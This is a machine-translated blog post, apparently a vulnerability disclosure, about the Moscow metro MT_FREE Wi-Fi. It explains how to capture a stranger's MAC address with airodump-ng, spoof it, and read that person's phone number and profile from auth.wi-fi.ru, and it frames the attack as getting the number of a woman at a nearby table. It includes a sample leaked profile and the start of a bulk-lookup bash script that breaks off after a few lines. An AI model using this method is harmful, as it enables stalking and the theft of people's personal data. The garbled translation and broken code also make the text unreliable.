How to get a phone (almost) of any beauty in Moscow, or an interesting feature of MT_FREE

 
Setting
 
In the Moscow subway there is such a wonderful thing as a free wifi.
 
The only thing you need to enter it is to enter your phone number. And since the subway - though a convenient, but often a long, free network is used by almost everyone. In this interesting world, we liked the girl at the table opposite.
airodump-ng . Sometimes it's even possible to enter wi-fi without looking at ads, if the real owner of the mac-address paid for premium access.
 
Drain the data about yourself
 
But if you are not among the paid wi-fi, then you will be greeted by the page auth.wi-fi.ru. In addition to advertising, this page gives one interesting json, which contains a bunch of interesting information about the current connected user.
 
Even if you paid for premium access, this page can always be opened by simply typing in the address in the browser.
 
A lot of interesting information [/b]
{
"dmpSegments":[],
"clicker_status": -?
"gender": "F",
"place": "",
"premium_groups": {
"premium_vip_status": -?
"mosmetro_premium_short_status": -?
"mosmetro_premium_status": 1
},
"line_id": "99",
"family_status": "not married",
"autoapp_status": ?
"premium": true,
"autoapp_user": null,
"age": "4500",
"interests": "307",
"train": "",
"device_price": "",
"mac": "98-00 - ** - ** - b3-66",
"ip": "???.191",
"groups":[
"cppk_basic",
"mosmetro_premium",
"mgt_basic",
"mosmetro_basic"
],
"home_station": "192: 193",
"msisdn": "7925 ***** 03",
"occupation": "student",
"profit": "medium",
"clicker": null,
"tags":[
"yandex.taxi",
"obed",
"coffee",
"analytics_742_k2",
"analytics_784_dns"
],
"avocation": "oywh4JCyQYOMHLy8ZM5AXqMZNhal0pDJl-OqBtuq09T5oBLS44GveLog8sWGm3ILB81zUC0mvW_l51J9ykx1kA ==",
"current_station": null,
"mnc": "02",
"uid": "4fb441e53d0dea858b6abe0dac222c21",
"job_station": "57",
"groups_data": {
"mosmetro_basic": {
"endDate": null,
"state": 1
},
"mosmetro_premium": {
"state": ?
"endDate": null
},
"mgt_basic": {
"state": ?
"endDate": null
},
"cppk_basic": {
"endDate": null,
"state": 1
}
}
}

 
I note that the phone number is not closed with asterisks in real data.
 
And, actually, how to find the number of beauty
 
I'm almost sure that you all guessed how our script will go.
 
Eva really wants to know Alice's phone at the table opposite (forbidden love!). Like most people in Moscow, using the phone, Alice also uses the MT_FREE network.
 
Eva watches Alice for a while, and learns her MAC using the airodump-ng utility, widely available and working on almost any waffle iron.
 
Having learned it, it follows in the metro, changes its poppy to poppy Alice, opens the page auth.wi-fi.ru and gets the coveted number.
 
I'm too lazy to even check this
 
But wait, potential Eva! To simplify the work of picking dozens of poppies from a snack bar in
search for the phone
your painstaking study of wi-fi security, I made a small script! You can find it at the bottom of the article.
 
To be continued?
 
It works getting the data about the user so far only in the metro, because remotely I have not managed to convince the server that the poppy is not in me 00: 00: 00: 00: 00. Earlier there was an opportunity to transfer a poppy in parameter client_mac, but I yet did not find an analogue.
 
Disclaimer
 
I reported on the vulnerability (surely it was done before me, this thing is obvious to impossible) a week ago, and without receiving any response, decided to reveal it here. I apologize for any captaincy that might have been in this article.
 
All the above disclaimer is written on behalf of a fictional character, and is fiction. His motives do not coincide with mine, and I do it solely for research purposes. And I do not even really understand what to do with the beauty phone, which did not give it to me.
 
I will not show airodump-ng on the manual, so as not to reduce the level of entry to zero.
 
Script
 
For those who just look [/b]
#! /bin /bash
# script for finding userdata from a list of macs.
# for educational purposes only, of course.
!! sudo -p "we require sweet root juices to run, please let us in:" echo -n && exit 1
INPUT = $ 1
SSID = MT_FREE
DEV = wlp1s0
OUTDIR = check-`date +% d-% m-% yT% H:% M:% S`
[! -e $INPUT ]&& {echo 'no input'; exit 1;}
[-z $SSID ]&& {echo 'no connection'; exit 1;}
function progress () {echo -ne "
+ 0 -

Add comment